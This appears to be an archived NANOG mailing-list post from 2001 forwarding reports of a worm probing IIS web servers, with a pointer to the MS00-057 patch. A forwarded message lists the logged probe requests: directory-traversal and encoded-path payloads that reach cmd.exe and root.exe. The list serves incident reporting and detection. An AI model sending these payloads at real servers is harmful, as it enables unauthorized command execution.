North American Network Operators Group Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical FW: Re: Worm probes
|> -----Original Message----- |> From: Jaco Engelbrecht [mailto:[email protected]] |> Sent: Tuesday, September 18, 2001 9:01 AM |> To: Roeland Meyer |> Subject: Re: Worm probes |> |> |> Hi, |> |> Sorry for emailling you directly, but I can't post to the nanog list. |> It's `Code Blue` that's going around atm. |> |> Will bounce you a seperate message now. |> |> Regards, |> Jaco |> |> -----Original Message----- Received: from serendipity.org.za ([196.14.22.14]) by condor.mhsc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id SBLN3KQ6; Tue, 18 Sep 2001 09:02:18 -0700 Received: from nobody by serendipity.org.za with scanned_ok (Exim 3.22 #6) id 15jNJQ-0003O1-00 for [email protected]; Tue, 18 Sep 2001 18:01:28 +0200 Received: from etna.serendipity.org.za ([196.14.22.132] helo=etna) by serendipity.org.za with smtp (Exim 3.22 #6) id 15jNJP-0003Ns-00 for [email protected]; Tue, 18 Sep 2001 18:01:27 +0200 Message-ID: <[email protected]> From: "Jaco Engelbrecht" <[email protected]> To: "Roeland Meyer" <[email protected]> Subject: Fw: [[email protected]: Re: New worm going 'round?] (fwd) Date: Tue, 18 Sep 2001 18:05:18 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-Checked: This message has been scanned for any virusses and unauthorized attachments. X-iScan: Version $Id: iScan,v 1.35 2001/03/04 20:15:54 rip Exp $ |> From: Jaco Engelbrecht [mailto:[email protected]] |> Sent: Tuesday, September 18, 2001 9:05 AM |> To: Roeland Meyer |> Subject: Fw: [[email protected]: Re: New worm going 'round?] (fwd) |> Importance: High |> |> |> Hi Roland, |> |> `Code Blue` - see http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dex ploit%26vid%3D1806 |> |> And for the the solution: |> "The patch released with the advisory MS00-057 |> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) |> eliminates this vulnerability, therefore those who have already |> applied this patch do not have to take any further action. Otherwise, |> the patch is available |> at the following locations: |> |> IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp |> IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp" |> |> Regards, |> Jaco |> |> -- |> [email protected] |> the faculty of making fortunate discoveries |> |> ----- Forwarded message from The Flying Hamster |> <[email protected]> ----- |> |> Date: Tue, 18 Sep 2001 15:36:20 +0100 |> From: The Flying Hamster <[email protected]> |> To: [email protected] |> Subject: Re: New worm going 'round? |> Reply-To: [email protected] |> |> On Tue, Sep 18, 2001 at 10:31:59AM -0400, Gerald T. Freymann wrote: |> > If I tail -f httpd-error.log these errors are going by |> faster than I |> can |> > read! omg! |> |> Same here, the signature requests appear to be |> |> GET /MSADC/root.exe?/c+dir HTTP/1.0 |> GET |> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir |> HTTP/1.0 |> GET /_vti_bin/..%255c../..%25 |> GET |> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir |> HTTP/1.0 |> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET |> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c |> 1%1c../wi |> nnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/root.exe?/c+dir HTTP/1.0 |> |> It looks like each of these are tried against each IP being probed. |> |> -- |> The Flying Hamster <[email protected]> |> http://hamster.wibble.org/ |> "Unarmed...and extremely attractive." -- Dana Scully on Windows 95 |> - |> Recent archives of the list can be found at: |> http://mix.twistedpair.ca/pipermail/inet-access/ |> Send 'unsubscribe' in the body to '[email protected]' to |> leave. |> Eat sushi frequently. [email protected] is the human contact |> address. |> |> ----- End forwarded message ----- |> |> |> |>
|